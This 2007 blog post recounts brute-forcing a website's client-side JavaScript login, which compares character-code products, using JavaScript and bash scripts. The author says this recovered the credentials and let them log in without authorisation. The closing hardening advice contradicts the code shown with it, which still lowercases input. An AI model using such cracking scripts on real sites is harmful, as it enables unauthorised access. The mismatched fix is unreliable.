Archive for July, 2007

Hacking Javascript

Monday, July 30th, 2007

I came across a website recently with the following Javascript code to password protect the site
function submitentry(){
password = document.password1.password2.value.toLowerCase()
username = document.password1.username2.value.toLowerCase()
passcode = 1
usercode = 1
for(i = 0; i < password.length; i++) {
passcode *= password.charCodeAt(i);
}
for(x = 0; x < username.length; x++) {
usercode *= username.charCodeAt(x);
}

if(usercode==160891453245600&&passcode==120622737064212)

{
window.location=password+”.htm”}
else{
alert(passcode)}
}

I thought it might be possible to find the username and password, so I put together the following JavaScript

do{
passcode = 0
var j = Math.ceil((Math.random()*26) + 96);
var k = Math.ceil((Math.random()*26) + 96);
var l = Math.ceil((Math.random()*26) + 96);
var m = Math.ceil((Math.random()*26) + 96);
var o = Math.ceil((Math.random()*26) + 96);
var p = Math.ceil((Math.random()*26) + 96);
var q = Math.ceil((Math.random()*26) + 96);
passcode = (j*k*l*m*o*p*q);
}while (passcode!=120622737064212);
alert (j + " " + k + " " + l + " " + m + " " + o + " " + p + " " + q);

Unfortunately the JavaScript interpreter of my browser couldn’t cope with this, but the principle of the script was basically OK. You can see this by running the following script

do{
passcode = 0
var j = Math.ceil((Math.random()*26) + 96);
var k = Math.ceil((Math.random()*26) + 96);
var l = Math.ceil((Math.random()*26) + 96);
var m = Math.ceil((Math.random()*26) + 96);
//var o = Math.ceil((Math.random()*26) + 96);
//var p = Math.ceil((Math.random()*26) + 96);
//var q = Math.ceil((Math.random()*26) + 96);
passcode = (j*k*l*m);
}while (passcode!=132825000);
alert (j + ” ” + k + ” ” + l + ” ” + m );
This should give you an alert message with 110 105 115 and 100, when you set up a web-page with this script. From the length of the numbers 160891453245600 and 120622737064212 I guessed there were 2 seven letter sequences to be found. To break the original problem I had to resort to a bash script:

#!/bin/bash
RANDOM=$$

PIPS=26
MAXTHROWS=1
throw=0
passcode=0

zeroes=0
ones=0
twos=0
threes=0
fours=0
fives=0
sixes=0
sevens=0
eights=0
nines=0
tens=0
elevens=0
twelves=0
thirteens=0
fourteens=0
fifteens=0
sixteens=0
seventeens=0
eighteens=0
nineteens=0
twenties=0
twentyones=0
twentytwos=0
twentythrees=0
twentyfours=0
twentyfives=0
twentysixes=0

print_result ()
{
echo
echo “as = $ones”
echo “bs = $twos”
echo “cs = $threes”
echo “ds = $fours”
echo “es = $fives”
echo “fs = $sixes”
echo “gs = $sevens”
echo “hs = $eights”
echo “is = $nines”
echo “js = $tens”
echo “ks = $elevens”
echo “ls = $twelves”
echo “ms = $thirteens”
echo “ns = $fourteens”
echo “os = $fifteens”
echo “ps = $sixteens”
echo “qs = $seventeens”
echo “rs = $eighteens”
echo “ss = $nineteens”
echo “ts = $twenties”
echo “us = $twentyones”
echo “vs = $twentytwos”
echo “ws = $twentythrees”
echo “xs = $twentyfours”
echo “ys = $twentyfives”
echo “zs = $twentysixes”
echo “Passcode = $passcode”
echo
}

update_count()
{
case “$1″ in
0) let “ones += 1″;; # Since a is not “zero”, this corresponds to 1.
1) let “twos += 1″;; # And b to 2, etc.
2) let “threes += 1″;;
3) let “fours += 1″;;
4) let “fives += 1″;;
5) let “sixes += 1″;;
6) let “sevens += 1″;;
7) let “eights += 1″;;
8) let “nines += 1″;;
9) let “tens += 1″;;
10) let “elevens += 1″;;
11) let “twelves += 1″;;
12) let “thirteens += 1″;;
13) let “fourteens += 1″;;
14) let “fifteens += 1″;;
15) let “sixteens += 1″;;
16) let “seventeens += 1″;;
17) let “eighteens += 1″;;
18) let “nineteens += 1″;;
19) let “twenties += 1″;;
20) let “twentyones += 1″;;
21) let “twentytwos += 1″;;
22) let “twentythrees += 1″;;
23) let “twentyfours += 1″;;
24) let “twentyfives += 1″;;
25) let “twentysixes += 1″;;
esac
}

while [ “$throw” -lt “$MAXTHROWS” ]
do
let “die1 = RANDOM % $PIPS”
let “die2 = RANDOM % $PIPS”
let “die3 = RANDOM % $PIPS”
let “die4 = RANDOM % $PIPS”
let “die5 = RANDOM % $PIPS”
let “die6 = RANDOM % $PIPS”
let “die7 = RANDOM % $PIPS”
let “passcode = (die1+97)*(die2+97)*(die3+97)*(die4+97)*(die5+97)*(die6+97)*(die7+97)”
if test $passcode = 120622737064212 ; then
let “throw += 1″
update_count $die1
update_count $die2
update_count $die3
update_count $die4
update_count $die5
update_count $die6
update_count $die7
print_result
fi

done

exit 0
This was a modification of a lottery script I got off the internet. Unlike the JavaScript interpreter the bash script just keeps running until it produces a result.

Eventually, after a day or so I returned to my computer to find the following output:

as = 3
bs = 0
cs = 0
ds = 0
es = 0
fs = 0
gs = 1
hs = 0
is = 0
js = 0
ks = 0
ls = 1
ms = 2
ns = 0
os = 0
ps = 0
qs = 0
rs = 0
ss = 0
ts = 0
us = 0
vs = 0
ws = 0
xs = 0
ys = 0
zs = 0
Passcode = 120622737064212
This revealed the passcode to be a commonly used word in dentistry. I ran
through the same code again to get the username and was able to login.
To improve the security of the website
I would leave out the ".toLowerCase()" bits in the JavaScript below.

function submitentry(){
password = document.password1.password2.value.toLowerCase()
username = document.password1.username2.value.toLowerCase()
passcode = 1
usercode = 1
for(i = 0; i < password.length; i++) {
passcode *= password.charCodeAt(i);
}
for(x = 0; x < username.length; x++) {
usercode *= username.charCodeAt(x);
}

if(usercode==160891453245600&&passcode==120622737064212)

{
window.location=password+".htm"}
else{
alert("password/username combination wrong")}
}

This would mean the potential cracker would have to work their computer
much harder to break the passcodes. If you introduced other characters
or numbers it would become very difficult or nearly impossible to break
down.